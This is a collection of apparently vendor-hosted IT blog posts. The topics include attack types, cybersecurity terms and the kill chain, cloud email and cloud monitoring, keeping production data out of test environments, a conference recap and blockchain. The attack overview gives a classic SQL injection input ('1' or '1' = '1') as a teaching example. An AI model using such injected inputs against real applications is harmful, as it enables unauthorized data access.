In the first blog of this series, we became familiar with some well-used cybersecurity terminology. This blog will look at some well-known attack and threat types and how they can be perpetrated. As a couple of readers pointed out, the definition of threat should focus on malicious (or inadvertent) actions on a computer system. So, although the network may allow threats to gain entry into an organization, it’s a specific target or vulnerable system that allows a threat to take hold.


This blog will look at three common categories of attack: Network, Web Application, and Endpoint.


Network Attacks


Denial of Service: The goal of a denial of service (DoS) attack is to make a machine or network resource unavailable to legitimate users by flooding the resource with an excessive volume of packets, rendering it inaccessible or even crashing the system. Some examples include TCP SYN floods and buffer overflows.


Distributed Denial of Service: Incoming traffic flooding the victim originates from many different sources, making it harder to isolate a specific source to block. Distributed denial of service (DDoS) attacks have grown in impact due to increased capacity and bandwidth that allow for larger amounts of bogus traffic to be directed at a target system. Application-specific attacks also exist that focus on network infrastructure and infrastructure management tools, or applications that may be flooded with maliciously crafted requests.



Man-in-the-middle: MITM occurs when a malicious actor hijacks an exchange between two parties, allowing the attacker to intercept, send, and receive data meant for someone else. In another form of MITM, an attacker may use a sniffer program to eavesdrop on a legitimate exchange. Some examples include email hijacking and Wi-Fi eavesdropping.


Web Application Attacks


SQL injection: Based on the of insertion or "injection" into an SQL query to manipulate a standard SQL query to exploit non-validated input vulnerabilities in a database, allowing attackers to spoof identity, tamper with, disclose, or destroy existing data. An inline attack can be accomplished by placing meta characters into data inputs (for example, $username = 1' or '1' = '1), which may then be executed as predefined SQL commands in the control plane, as in SELECT * FROM Users WHERE username='1' OR '1' = '1', which can return an actual value due to the condition OR ‘1’ = ‘1’.

Other examples of injections involve the use of end of line or inline comments, stacked queries, IF statements, and strings without quotes, as well as many others.


Cross-site scripting (XSS): Injects malicious code into a vulnerable web application. Unlike SQL injection that targets an application, XSS exploits a vulnerability within a website or web application, facilitating the delivery of a malicious script to a victim’s browser. There are two categories of XSS: Stored or Persistent.

Reflected XSS reflects a malicious script off of a web application and onto a user’s browser through an embedded link that is activated when clicked on.


Endpoint-based Attacks


Buffer overflows: This condition exists when a program writes more data to an allocated buffer than it can store, leading to corrupted data, program crashes, or enabling the execution of malicious code by overwriting a function’s return pointer, thereby transferring control to the malicious code. Attackers research and identify buffer overflows products and components, and then attempt to exploit them.


Command and control (C2): A C&C server is a computer controlled by an attacker that is used to send commands to systems compromised by malware and receive stolen data from a target network, and which also allows attackers to move laterally inside a network. C&C servers also serve as the control point for compromised machines in a botnet.



Rootkit: A rootkit is a “hidden” program designed to provide continued privileged access to a computer. A rootkit may consist of a collection of tools that enable administrator-level access to a computer or network, or they can be associated with malware such as concealed Trojans, worms, and viruses.


Port scanning: Hackers conduct port-scanning techniques to identify potential vulnerabilities associated with specific computer ports. While not an attack in itself, this activity is often known as reconnaissance, which is often the precursor to other activities.


This is a summary of the some of the more well-known attack types. It is a starting point only, and the reader is encouraged to research the ever-evolving threat landscape to understand the challenges faced by cybersecurity professionals in their quest to mitigate and protect against compromise. In the next blog, we will review some of the typical tools and methods available for these challenges.

By Paul Parker, SolarWinds Federal & National Government Chief Technologist


The federal government is eager to migrate to a cloud-based email system, and for good reasons. Cloud-based email offers huge operational benefits, especially considering the sheer number of users and the broad geographical footprint of the federal government. It is also much simpler and cheaper to secure and manage than on-premises email servers.


Cloud email also poses some unique challenges. IT managers must carefully track their email applications to ensure cloud-based email platforms remain reliable, accessible, and responsive. They must also continuously monitor for threats and vulnerabilities.


Unfortunately, even the major cloud-based email providers have had performance problems. Last year, Google suffered a massive and systemic issue across multiple platforms that affected all of its applications, including Gmail. This past February, a Yahoo Mail outage affected customers around the world for days. And the solution that many agencies rely on, Office 365, has been subject to service outages in Europe and in the United States.


Any amount of downtime or lost productivity is too much for federal agencies. Government employees rely on instantaneous communication to make decisions, and email is a technology that most federal organizations cannot live without.


Fortunately, many agencies are already actively monitoring their cloud environments. They simply need to apply similar practices, with some email-specific strategies, to help ensure a high level of performance and reliability.


Gain visibility into email performance


Sporadic issues, which can include network latency and bandwidth constraints, can directly influence the speed at which email is sent and delivered. These can be hard to identify without the proper tools and processes in place.


Administrators must have clear visibility into everyday key performance metrics on the operations of their cloud-based email platforms. The cloud and cloud-based email systems can fall victim to many of the same threats that cause cybersecurity problems in a traditional environment.


Ideally, administrators should set up an environment that allows them to get a complete picture of their cloud-based email platform as it relates to whatever on-premises server they may be using. For example, administrators whose agencies use Office 365 in conjunction with Microsoft Exchange should be able to monitor both simultaneously, allowing them to more easily identify and fix issues as they arise.


Monitor mail paths


When email performance falters, it can be difficult to tell whether the fault lies in the application or the network. This challenge is often exacerbated when the application resides in the cloud, which can limit an administrator’s view of issues that might be affecting the application.


Application path monitoring can be crucial in gaining visibility into the performance of email applications, especially those that reside in a hosted environment. Administrators must be able to monitor the “hops” that requests take to and from their email servers to better understand service quality and identify any factors that may be inhibiting email performance. This visibility can help them troubleshoot problems without spending time trying to determine if the application or network is the source of the problem.


While administrators have little control over when a server goes down at an email host location, they do have many options to manage and optimize their cloud-based email platforms. By applying their standard network monitoring solutions and strategies to their email platforms, they can gain better insight into the performance of cloud email servers and help keep communications up and running smoothly.


Find the full article on GCN.

In my earlier post in this data protection series, I mentioned that data security and privacy is difficult:


Building a culture that favours protecting data can be challenging. In fact, most of us who love our data spend a huge amount of time standing up for our data when it seems everyone else wants to take the easiest route to getting stuff done.


Today I'll be talking about one of the most insecure and unprotected ways we harm data during our development processes. And I'm warning you: these are all contentious positions I hold. I'm experienced (old) enough to stand up for these positions. I know I'm going to get flak for stating them. I'm ready. Are you? Let's start with the most contentious one.



In all my years of presenting to audiences about data protection, this is the position where we get the most disagreement. I understand those positions. But it is still my opinion that taking a backup and restoring to development and test environments is wrong.


Development environments are notoriously less secure than production ones. In the old days, developers connected to servers to do their development. Most of those services were located in a data center and at least had those protections. Now I'm much more likely to see developers working on their own laptops, often personally owned ones. These are often shared devices, with little or no enterprise protections because developers can't be constrained by such overhead and governance during development.


Because developers are system administrators of their local environments, they often remove most of the security features within their development environment to speed up development and test processes. Encryption, row level security, data masking, and other database features are likely to be removed.


Unlike a production environment, there aren't any data access monitoring and alerting solutions. Developers and DBAs tend to memorize data to facilitate their dev and test processes. They know the interesting customer data, transactions, and financial information that they use over and over for testing. In fact, they often have the data itself memorized. The very thing they would not be allowed to do in production they do every day in the dev environment that hosts production data.


Developers and DBAs tend to treat development data with less respect than production data because "it's just development." If something goes wrong, we can just rebuild it. The challenge with this thinking is that it's a dev environment with production data. It's not just development. This is one of the reasons we have recently seen a spike in data breaches due to IT professionals sharing their dev data in unsecured cloud storage buckets. Or they email production data, log it into bug systems, share it on a file server. Carry it around on unsecured thumb drives. "It's just test data, after all." No, it's not. It's still production data, even though you've moved it to a test environment.



When I recommend that teams stop using production data for development, the first thing they say is that this is the only test data they have. Yes, that's true. But it isn't the only way. We could develop test data based on the test cases we are going to run. That way we can test all the features of the applications, not just the features our current customer set reveals. We could generate more test data based on that data. We could require test case writers to create test data. Yes, that takes time.


I believe our industry should be developing a set of what I call lorem ipsum data for People, Places, Things, Events, Transactions, etc. This dataset could be crowdsourced and curated by the entire community. Yes, this will be hard work. Yes, it will require a lot of curation. No, it will be not much fun. But, think of all the places your own personal data is located. How comfortable are you that your data is being used for development and test on perhaps millions of laptops around the planet? How comfortable are you that someone has chosen your home address and the list of your family as the one record they have memorized for running their test-driven development processes?


I do believe there are valid cases where production data should be used in special testing scenarios. First, if you are doing a data migration project, at some point you still need to do a test migration using a subset of your production data. These tests would be just prior to completing the actual migration. But that production data would still be in its secured formats; it would not be used for the earlier dev and test processes.


Another example is when you are testing the application of new security features in your database environment and you want to see if there are any cases where your existing data or design has challenges implementing those features. Again, this test would be done late in the process.


There may be other use cases where testing of production data is required, but none of them should form the bases of using production data for general development and test methods. You can test them on me in the comments.



I've come to this position after decades of watching people's data being treated with disrespect because it's a faster way to do lesser testing (more on this “lesser testing” in a future post). That should seem wrong to all of you, and I know a few people who share these positions with me, even if I'm overwhelmingly outnumbered. One of the key things that has changed over the last few years is news of data breaches due to exposure of production data in development environments. I don't believe the number of breaches has increased; I believe the number of breach disclosures has increased due to data privacy notifications. With GDPR, we will also have significant fines and even jail terms due to sloppy data practices. How much do you really love that job that you are willing to risk this?


I recommend you start the discussions about generating real test data now. At least you will have shown you tried to take steps to protect data. Your defense lawyer will thank you.


Hey everyone, I've had a chance to decompress and gather my thoughts from Cisco Live US 2018 (#CLUS18, as the cool kids say). So, pour yourself a liquid refreshment, sit back, and let me tell you how it went.


Location, Location, Location

After two years in the climatological hellscape that is Las Vegas (June clocks in at about 110 degrees!), Orlando made a refreshing change. And I'm told that our week at Cisco Live was pretty typical: It hovered around 90 degrees, was humid enough that you could use a jet ski to get from the hotel to the venue, and there was a torrential downpour each night around 5 p.m. Not that I'm complaining. OK, maybe a little.


However, folks down near the house of the mouse have mastered the art of A/C—you never went into hypothermic shock from walking into a store, bus, or convention center. You just walked in and it was... good. Nice. And the afternoon rains tended to cool everything down, but they didn't stick around long enough to completely trash whatever nighttime plans you made.


The View from the Booth

I'm going to write more about this elsewhere, but the thing that struck me most was that software defined networking (SDN) seems to have finally arrived (at least for some) in the enterprise. This was the first time a customer—a real live, breathing, non-carrier customer—came to the booth and told me they were running SDN in their production environment. And they were REALLY running it: 2 production and 2 dev environments. That shows me SDN (via Cisco’s ACI and yes, it’s different, but close enough for this conversation) is finally finding a place in the typical enterprise, not just ISPs.


Meanwhile, folks who visited the booth had an insanely positive response to the SolarWinds story. Make no mistake, scalability is an evergreen topic that comes up at EVERY show. But with the improvements introduced in NPM 12.3 (and NTA 4.4, and NCM 7.8), it was such a fun conversation. It was the first time that people told me “Oh, THAT much? Oh, we don't need THAT much.” Automated mapping put a smile on people’s faces. And the interface code snippets were the sleeper “take my money” hit of the convention.


This year we had a prime spot and got to view a lot of the typical #CLUS antics up close. Of course, people came to us to help satisfy their #SocksOfCLUS cravings. #KiltedMonday was extremely well-attended (and included our own Kevin Sparenberg). And this year saw the first ever #ColumnsOfCLUS trend, where people took selfies next to the columns with SolarWinds information on it for fun, fame, and even prizes.


Heard it Through the Grapevine

This year I heard some amazingly compelling stories from attendees that helped me understand the boots-on-the-ground reality for network specialists.


One person I spoke to has been in networking for over 3 decades. This was his first Cisco Live since San Diego in 2015. He attended the full week including the Sat/Sun sessions and came away both impressed and slightly depressed. His comment was that “DNA looks amazing. We have to have it. But Cisco needs to understand that for guys like me, there’s an 8-year lead time. Going to DNA isn't like replacing our 3650s with 4900 series devices one at a time as budget permits. To make this new technology work, all our infrastructure has to change. I work in the medical sector. We’ve got money. But it’s hard to justify new gear when the current gear is still passing packets. I’ll keep an eye on it, but it ain’t happening right now.”


Another IT pro had a more hopeful story for me regarding his growth. He was working as a substitute teacher back in 2009, when on a lark he interviewed for a level 1, third shift NOC position. He used that third shift time to learn everything he could, made a couple of smart job hops, kept pushing for more challenging projects, and is now a lead network engineer at his company. But because of his NOC experience, he remained the go-to person for monitoring at each job. That's what allowed him to have access to the new equipment, and to be part of setting up and maintaining that gear.


There were some interesting stories (i.e., gossip) to be overheard both on social media and as I passed people in the halls between sessions. For example, there was this comment on Twitter:


"I just heard @ChuckRobbins say that the transition to ACI and orchestration is incredibly complicated. I can’t count the number of times I’ve been shouted down by @Cisco engineers for saying the exact same thing. Refreshing to hear from the top."


Cisco’s developer network, aka DevNet, announced that it had reached 500,000 members since the program was created in 2014. That is also noteworthy. Life as code indeed!


The #SWUG Life

Cisco Live's total domination of Orlando meant that space was at a premium, which left Danielle Higgins—our stalwart THWACK guru and SWUG coordinator—with a challenge. We knew we had to get our SolarWinds users together, but WHERE? In the end Danielle picked what I believe to be the perfect location, @ThePub (, where we could get a drink AND our geek on. After a long day of sessions, demos, and conversations, The Pub was a welcome setting.


The Home Fires Were Definitely Burning

While I was rolling around Cisco Live, my kids were trolling me from home. What started at Cisco Live US 2017 and continued through Cisco Live Europe 2018 hit perhaps (I hope) its pinnacle at #CLUS18. They posted sad faces. They played Quidditch from my rooftop. They slow-mo sledgehammered my network gear. The Cisco Live social media team awarded them "Best remote attendee," but I now need to figure out how I'm ever going to feel safe leaving home again.



Final Thoughts

The theme of the opening keynote was "chaos and wonder" (you can view that keynote here: and I'm OK with that. Anyone who has worked in IT gets the “chaos” part. Anyone who has been watching the industry these last 4 years also understands that pretty well.


But the “wonder” part… that makes me happy. As IT practitioners and networking specialists, what we are able to do—what we GET to do—on a regular basis is still insanely cool. Sometimes it’s legitimately the stuff of science fiction. And while many of us treat it as “ho-hum, that’s my day job,” to folks who are NOT in IT, it’s nothing short of miraculous.


And it is. Sometimes we need to recapture and revel in the sheer wonder of what we do.

This week's Actuator comes to you fireside, as I am able to start enjoying the results of three weeks worth of hard work building an outdoor living area. We had planned to hire someone to do this work, but they never got back to us so we decided we could do it ourselves. It's been exhausting, but rewarding. There's something to be said for building things yourself. But not databases. Let a professional help you, please.


As always, here are some links from the Intertubz that I hope will hold your interest. Enjoy!


Python has brought computer programming to a vast new audience

People are using Google to search for Python more than they are searching for a Kardashian. Also warrants mentioning – Python gets its name from Monty Python.


Netflix Cloud Security SIRT releases Diffy: A Differencing Engine for Digital Forensics in the Cloud

Another great example of Netflix being awesome. I love how they are taking their internal tools and making them available for others to use and, in theory, improve upon over time for the benefit of everyone.


Surprise! Top sites still fail at encouraging non-terrible passwords

In related news, I am spending up to 30 minutes of my day logging into websites and having to retrieve passwords from 1Password or using two-factor authentication. Security has a cost, and part of that cost is time spent logging into websites, apparently.


Hackers account for 90% of login attempts at online retailers

This is why we can’t have nice things.


Why health insurers track when you buy plus-size clothes or binge-watch TV

As someone that has had difficulty with Optum, this article drives home how healthcare decisions are being made. What should be in the hands of the doctors is often in the hands of a computer program and a person that has no idea about you, your health, or your needs.


Colleges ask for a share of future salary in lieu of loans

At first I thought this idea was horrible, but after reading it a few times and thinking about it a bit more, I now think this is a terrible idea. Schools are a business, diploma mills mostly, and this financial arrangement has the potential for abuse.


The mistake that almost got me fired but transformed my career

If you haven’t hit this point in your career, I hope you do soon. Or keep an updated resume handy.


One of the joys of summer - carnival food! Here's a sausage, topped with pulled pork, topped with bacon:


What happens to our applications and infrastructure when we place them in the cloud?  Have you ever felt like you’ve lost insight into your infrastructure after migrating it to the cloud?  There seems to be a common complaint among organizations that at one point in time had an on-premises infrastructure or application package. After migrating those workloads to the cloud, they feel like they don’t have as much ownership and insight into it as they used to.


That is expected when you migrate an on-premises workload to the cloud: it no longer physically exists within your workplace.  On top of your applications or infrastructure being out of your sight physically, there is now a web service (depending on the cloud service) that adds another layer of separation between you and your data. This is the world we now live in; the cloud has become a legitimate option to store not only personal data, but enterprise data and even government data. It’s going to be a long road to 100% trust in storing workloads in the cloud, so here are some ways you can still feel good about monitoring your systems/infrastructures/applications that you’ve migrated to the cloud.


Cloud Systems Monitoring Tools

Depending on your cloud hosting vendor, you may have some built-in tools that you can utilize to maintain visibility into your infrastructure and applications. Here’s a look at each of the big players in the cloud hosting game and what built in tools they have for systems monitoring:


Amazon Web Services CloudWatch

AWS has become a titan in the cloud hosting space and it doesn't look like they're slowing down anytime soon. Amazon offers a utility called Amazon CloudWatch that offers you complete visibility into your cloud resource and applications. CloudWatch allows you to see metrics such as CPU utilization, memory utilization, and other key metrics that you would define. Amazon’s website summarizes CloudWatch as the following:

“Amazon CloudWatch is a monitoring and management service built for developers, system operators, site reliability engineers (SRE), and IT managers. CloudWatch provides you with data and actionable insights to monitor your applications, understand and respond to system-wide performance changes, optimize resource utilization, and get a unified view of operational health. CloudWatch collects monitoring and operational data in the form of logs, metrics, and events, providing you with a unified view of AWS resources, applications and services that run on AWS, and on-premises servers. You can use CloudWatch to set high resolution alarms, visualize logs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to optimize your applications, and ensure they are running smoothly (AWS CloudWatch).”


Microsoft Azure Monitor:

Azure Monitor is a monitoring tool that allows users to navigate different key metrics gathered from applications, application logs, Guest OS, Host VMs, and activity logs within the Azure infrastructure. Azure Monitor visualizes those key metrics through graphics, portals views, dashboards, and different charts. Through Azure Monitor’s landing page, admins can onboard, configure, and manage their infrastructure and application metrics. Microsoft describes Azure Monitor as follows:

“Azure Monitor provides base-level infrastructure metrics and logs for most services in Microsoft Azure. Azure services that do not yet put their data into Azure Monitor will put it there in the future (MS Azure website)… Azure Monitor enables core monitoring for Azure services by allowing the collection of metrics, activity logs, and diagnostic logs. For example, the activity log tells you when new resources are created or modified.”


Full-Stack Monitoring, Powered by Google:

Google Cloud has made leaps and bounds in the cloud hosting space in the last few years and is poised to be Amazon’s main competitor. Much like Microsoft and Amazon, Google Cloud offers a robust monitoring tools called Full-Stack Monitoring, Powered by Google. Full-Stack works to offer the administrator complete visibility into their application and platform. Full-Stack presents the admin with a rich dashboard with metrics such as performance, uptime, and health of the cloud-powered applications stored in Google Cloud. Google lays out a great explanation and list of benefits that Full-Stack Monitoring provides to the end-user:

“Stackdriver Monitoring provides visibility into the performance, uptime, and overall health of cloud-powered applications. Stackdriver collects metrics, events, and metadata from Google Cloud Platform, Amazon Web Services, hosted uptime probes, application instrumentation, and a variety of common application components including Cassandra, Nginx, Apache Web Server, Elasticsearch, and many others. Stackdriver ingests that data and generates insights via dashboards, charts, and alerts. Stackdriver alerting helps you collaborate by integrating with Slack, PagerDuty, HipChat, Campfire, and more (Google Cloud website).”


Trust but Verify

While there are several great proprietary tools provided by the cloud vendor of choice, it’s imperative to verify that the metrics gathered are accurate. There are many free tools out there that can be run against your cloud infrastructure or cloud driven applications.  While it’s become increasingly acceptable to trust large cloud vendors such as Google, Amazon, and Microsoft, the burden rests on the organization to verify the data they are receiving in return. 

By Paul Parker, SolarWinds Federal & National Government Chief Technologist


Blockchain is no longer just a buzzword or simply a “technology to watch.” This database technology is being explored by agencies across government. The promise of blockchain is dramatic. It can help enhance agencies’ business processes and provide far greater transparency and efficiency.


That said, for federal IT professionals in particular, understanding blockchain technology—as well as its advantages and potential downsides—is a critical first step in determining its viability within an agency setting and its true potential and impact.


Blockchain 101


Blockchain is a peer-to-peer distributed database technology created as the platform for Bitcoin exchange. In a nutshell, the technology uses a vast number of interconnected peer-based computers to store blocks of information. This distributed database of information is continually updated and reconciled.


One of the primary advantages of blockchain is that it can authenticate a user’s identity and create verifiable histories of transactions that take place within the network. In fact, the technology does this automatically. It supports interactions between machines that can eliminate the need for human intervention or oversight.


Additional advantages of blockchain are that there is no single point of failure, and it is not controlled by any one entity. The primary disadvantages stem from blockchain still being a relatively new technology. For example, there are questions about (and challenges with) scalability and performance. There is also the challenge of complexity, as well as a current lack of industry standards.


Having started as the platform that manages Bitcoin transactions, blockchain is seeing quick entry into the financial industry, as nearly every major bank worldwide is testing the technology in some capacity. Banks are betting that blockchain can be used to create a secure alternative to time-consuming and expensive banking processes through dramatically increased automation.


Financial institutions, and associated banking applications, are only one small example of the types of organizations and applications that can benefit from the type of enhanced automation this technology provides.


Some natural progressions for the technology are identity management and transaction verification. At a time when agencies are finding it difficult to deal with data management and security, blockchain provides a seemingly perfect solution. GSA, for example, is looking into how blockchain technology can speed up IT Schedule 70 contract processing through enhanced automation.


Going one step further, supply chain use cases are now being tested and implemented to ensure the safety, security, and integrity of the information associated with these processes. Case in point: the Federal Maritime Commission is exploring blockchain for licensing and permitting processes.




Rest assured, we are only seeing the tip of the iceberg in blockchain testing and implementation within the federal government. There are already federally-focused organizations—the Government Blockchain Association and DC Blockchain Center, for example—designed specifically to explore how the government can use this technology to enhance business processes and to provide greater transparency and efficiency. Stay tuned. There will most certainly be more; and that’s great news.


Find the full article on our partner DLT’s blog Technically Speaking.

Many of us have or currently operate in a stovepipe or silo IT environment. For some this may just be a way of professional life, but regardless of how the organizational structure is put together, having a wide and full understanding of any environment will lend itself to a smoother and more efficient system overall. As separation of duties continues to blur in the IT world, it is becoming increasingly important to shift how we as systems and network professionals view the individual components and the overall ecosystem. As such changes and tidal shifts occur, Linux appears in the switching and routing infrastructure, servers are consuming BGP feeds and making intelligent routing choices, creating orchestration workflows that automate the network and the services it provides -- all of these things are slowly creeping into more enterprises, more data centers, more service providers. What does this mean for the average IT engineer? It typically means that we, as professionals, need to keep abreast of workflows and IT environments as a holistic system rather than a set of distinct silos or disciplines.


This mentality is especially important in monitoring aspects of any IT organization, and it is a good habit to start even before these shifts occur. Understanding the large-scale behavior of IT in your environment will allow engineers and practitioners to accomplish significantly more with less -- and that is a win for everyone. Understanding how your servers interact with the DNS infrastructure, the switching fabric, the back-end storage, and the management mechanisms (i.e. handcrafted curation of configurations or automation) naturally lends itself to faster mean time to repair due to a deeper understanding of an IT organization, rather than a piece, or service that is part of it.


One might think “I don’t need to worry about Linux on my switches and routing on my servers,” and that may be true. However, expanding the knowledge domain from a small box to a large container filled with boxes will allow a person to not just understand the attributes of their box, but the characteristics of all of the boxes together. For example, understanding that the new application will make a DNS query for every single packet the application sees, when past applications did local caching, can dramatically decrease the downtime that occurs when the underlying systems hosting DNS become overloaded and slow to respond. The same can be said for moving to cloud services: Having a clear baseline of link traffic -- both internal and external -- will make obvious that the new cloud application requires more bandwidth and perhaps less storage.


Fear not! This is not a cry to become a developer or a sysadmin. It's not a declaration that there is a hole in the boat or a dramatic statement that "IT as we know it is over!" Instead, it is a suggestion to look at your IT environment in a new light. See it as a functioning system rather than a set of disjointed bits of hardware with different uses and diverse managing entities (i.e. silos). The network is the circulatory system, the servers and services are the intelligence. The storage is the memory, and the security is the skin and immune system. Can they stand alone on technical merit? Not really. When they work in concert, is the world a happier place to be? Absolutely. Understand the interactions. Embrace the collaborations. Over time, when this can happen, the overall reliability will be far, far higher.


Now, while some of these correlations may seem self-evident, piecing them together and, more importantly, tracking them for trends and patterns has the high potential to dramatically increase the occurrence of better-informed and fact-based decisions overall, and that makes for a better IT environment.

In the first post of this blog series, we’ll cover the fundamentals of cybersecurity, and understanding basic terminology so you can feel comfortable “talking the talk.” Over the next few weeks, we’ll build on this introductory knowledge, and review more complex terms and methodologies that will help you build confidence in today’s ever-evolving threat landscape.


To start, here are some of the foundational terms and their definitions in the world cybersecurity.


Risk: Tied to any potential financial loss, disruption, or damage to the reputation of an organization from some sort of failure of its information technology systems.


Threat: Any malicious act that attempts to gain access to a computer network without authorization or permission from the owners.


Vulnerability: A flaw in a system that can leave it open to attack. This refers to any type of weakness in a computer system, or an entity’s processes and procedures that leaves information security exposed to a threat.


Exploit: As a noun, it’s an attack on a computer system that takes advantage of a particular vulnerability that has left the system open to intruders. Used as a verb, exploit refers to the act of successfully perpetrating such an attack.


Threat Actor: Also known as a malicious actor, it’s an entity that is partially or wholly responsible for an incident that affects, or has the potential to affect, an organization's security. Examples of potential threat actors include: cybercriminals, state-sponsored actors, hacktivists, systems administrators, end-users, executives, and partners. Note that while some of these groups are obviously driven by malicious objectives, others may become threat actors through inadvertent compromise.


Threat Actions: What threat actors do or use to cause or contribute to a security incident. Every incident has at least one, but most will be comprised of multiple actions. Vocabulary for Event Recording and Incident Sharing (VERIS) uses seven threat action categories: Malware, Hacking, Social, Misuse, Physical, Error, and Environmental.


Threat Vector: A path or tool that a threat actor uses to attack the target.



Now let’s look at how these basic terms become part of a more complex cybersecurity model. You’ve probably heard about the Cyber Kill Chain. This model outlines the various stages of a potentially successful attack. The best-known version of this model is the Lockheed Martin Kill Chain, including several phases.


Reconnaissance – Research, identification, and selection of targets, often represented as crawling internet websites, like social networks, organizational conferences, and mailing lists for email addresses, social relationships, or information on specific technologies.


Weaponization – Coupling a remote access Trojan with an exploit into a deliverable payload. Most commonly, application data files, such as PDFs or Microsoft Office documents, serve as the weaponized deliverable.


Delivery – Transmission of the weapon to the targeted environment via, for example, email attachments, websites, and USB removable media.


Exploitation – After payload delivery to victim host, exploitation triggers the intruders’ code. Exploitation targets an application or operating system vulnerability, or leverages an operating system feature that auto-executes code.


Installation – Installation of a remote access Trojan or backdoor on the victim system allows the adversary to maintain persistence inside the environment.


Command and Control – Advanced Persistent Threat (APT) malware typically establishes remote command and control channels so that intruders have “hands on the keyboard” access inside the target environment.


Actions on Targets – Typically the prime objective is data exfiltration, involving collecting, encrypting, and extracting information from the victim environment. Intruders may only seek access to a victim box for use as a jump point to compromise additional systems, and move laterally inside the network or attack other partner organizations.


The goal of any attack detection methodology is to identify a threat in as early a stage of the kill chain as possible. In subsequent blogs—as we build upon these foundational definitions and cover things such as attack surfaces and protection mechanisms—we will refer back to the phases of the kill chain when discussing certain threats, like malware and the role of protections such as IPS.


Note that as threat vectors have evolved and changed, the kill chain—although a good resource as a starting point—no longer covers all possibilities. This ensures that the job of a cybersecurity professional will never remain static.


Useful References: (This site uses cookies.)

The World Cup is over, but can France really be happy to win a tournament for which the USA didn't qualify?


As always, here are some links from the Intertubz that I hope will hold your interest. Enjoy!


Evaluating the Evaluation: A Benchmarking Checklist

Wonderful thoughts here on a checklist with regards to benchmarks and scalability. Wish I could go back in time and hand this to some developers that struggled with getting their code to scale.


Forget Legroom—Air Travelers Are Fed Up With Seat Width

Agreed, I’d prefer more width and elbow room. However, it’s legroom that really defines for me if I can work on my laptop. Paying for a business class seat should mean that you have room to work.


Unfollowing Everybody

I like this strategy, and I’ve done this a few times over the years. However, I’ve not thought about scripting it out, or using Excel to help drive my decisions about who to keep following.


Netflix Stuns HBO: Emmy Nominations by the Numbers

Reading this article made me realize that HBO and Netflix are clones of each other. Both companies were founded to provide media to our homes, one through cable and the other using the Post Office. Then, they both executed a pivot to be more than a distributor, they started creating the content they distribute. And now Netflix takes the lead, mostly due to their data-driven culture.


Are we truly alone in the cosmos? New study casts doubt on rise of alien life in our galaxy

The Fermi Paradox doesn’t get talked about enough. Probably because it can be a bit depressing to realize we are alone.


Apple’s most expensive MacBook Pro now costs $6,700

If you were wondering what to get a Geek like me for Christmas.


Burglar stuck in Vancouver escape room panics, calls 911

Seriously though, those rooms can be tough, and you are usually allowed a hint or two. Maybe that’s why he called.


Humbled and honored to be selected as a Microsoft MVP for the tenth consecutive year:

By Paul Parker, SolarWinds Federal & National Government Chief Technologist


Here is an interesting article from my colleague Joe Kim, in which he discusses how technology drives military asset management.


Military personnel need to be able to easily manage the lifecycle of their connected assets, from creation to maintenance to retirement. They can do this by creating a digital representation of a physical object, like a troop transport, which they can use for a number of purposes, including monitoring the asset’s health status, movements, location, and more.


The concept behind these “digital twins” was first presented in 2002 during a University of Michigan presentation by Dr. Michael Grieves, who posited that there are two systems: one physical, the other a digital representation that contained all of the information about the physical system. His thought was that the digital twin could be used to monitor and support the entire life cycle of its physical sibling and, in the process, keep that sibling functioning and healthy.


Digitizing a vehicle


Consider a military vehicle that has just rolled off the assembly line and is ready to be commissioned.

Getting the most out of this asset requires consistent maintenance. Ideally, that maintenance can be performed proactively to prevent any potential breakdowns. It can be difficult to know or keep track of when the vehicle may need maintenance, and impossible to predict when a breakdown may occur.


Fortunately, the data collected by the various sensors contained within the vehicle can be used to create a digital twin. This representation can provide a very clear picture, in real time, of its status.

Further, by collecting this information over time, the digital twin has the ability to create an evolving yet extraordinarily accurate picture of how the vehicle will perform in the future. As the sensors continue to report information, the digital twin continues to learn, model, and adapt its prediction of future performance.


This information can help teams in a number of ways. The analytics derived from historical performance data can be used to point to potential warning signs and predict failures before they occur, thereby helping avoid unwanted downtime. Data can also be used to diagnose a problem and even, in some cases, solve the issue remotely. At the least, digital twins can be used to help guide soldiers and repair specialists to quickly fix the problem on the ground.


The life cycle management process also becomes much more efficient. Digital twins can help simplify and accelerate management of a particular thing, in this case, a physical entity like a vehicle.


Taking the next step


The digital twin concept is a logical next step to consider for defense agencies that have already begun investing in software-defined services. These services are designed to simplify and accelerate the management of core technology concepts, including computing, storage, and networking. The idea is to improve the management of each of these concepts throughout their life cycles, from planning and design through production, deployment, maintenance, and, finally, retirement.


Digital twins take this concept a step further by applying it to physical objects. It’s an evolution for the military’s ever-growing web of connectivity. Digital twins, and the data analysis they depend on, can open the doors to more efficient and effective asset lifecycle management.


Find the full article on SIGNAL.

A recent conversation on Twitter struck a nerve with me. The person posited that,


"If you're a sysadmin, you're in customer service. You may not realise it, but you are there TO SERVE THE CUSTOMER. Sure that customer might be internal to your organisation/company, but it's still a customer!"


A few replies down the chain, another person posited that,


"Everyone you interact with is a customer."


I would like to respectfully (and pedantically) disagree.


First, let's clear something up: The idea of providing a "service," which could be everything from a solution to an ongoing action to consultative insight, and providing it with appropriate speed, professionalism, and reliability, is what we in IT should always strive to do. That doesn't mean (as other discussions on the Twitter thread pointed out) that the requester is always right; that we should drop everything to serve the requester's needs; that we must kowtow to the requester's demands. It simply means that we were hired to provide a certain set of tasks, to leverage our expertise and insight to help enable the business to achieve its goals.


And when people say, "you are in customer service" that is usually what they mean. But I wish we'd all stop using the word "customer." Here is why:


Saying someone is a customer sets up a collection of expectations in the mind of both the speaker and the listener that don’t reflect the reality of corporate life.


As an external service provider—a company hired to do something—I have customers who pay me directly to provide services. But I can prioritize which customers get my attention and which don’t. I can “fire” abusive customers by refusing to serve them; or I can prohibitively price my services for “needy” customers so that either they find someone else or I am compensated for the aggravation they bring me. I can choose to specialize in certain areas of technology, and then change that specialization down the road when it’s either not lucrative or no longer interesting to me. I can follow the market, or stay in my niche. These are all the things I can do as an external provider who has ACTUAL customers.


Inside a company, I can do almost none of those things. I might be able to prioritize my work somewhat, but at the end of the day I MUST service each and every person who requests my help. I cannot EVER simply choose to not help or provide service to a coworker. I can put them off, but eventually I have to get to their request. Since I’m not charging them anything, I can’t price my services in a way that encourages abusive requestors to go elsewhere. Even in organizations that have a chargeback system for IT services, that charge rate must be equal across the board. I can’t charge more to accounting and less to legal. Or more to Bob and less to Sarah. The services I provide internally are pre-determined by the organization itself. No matter how convinced I am that “the future is cloud,” I’m stuck building, racking, and stacking bare-metal servers in our data center until the company decides to change direction.


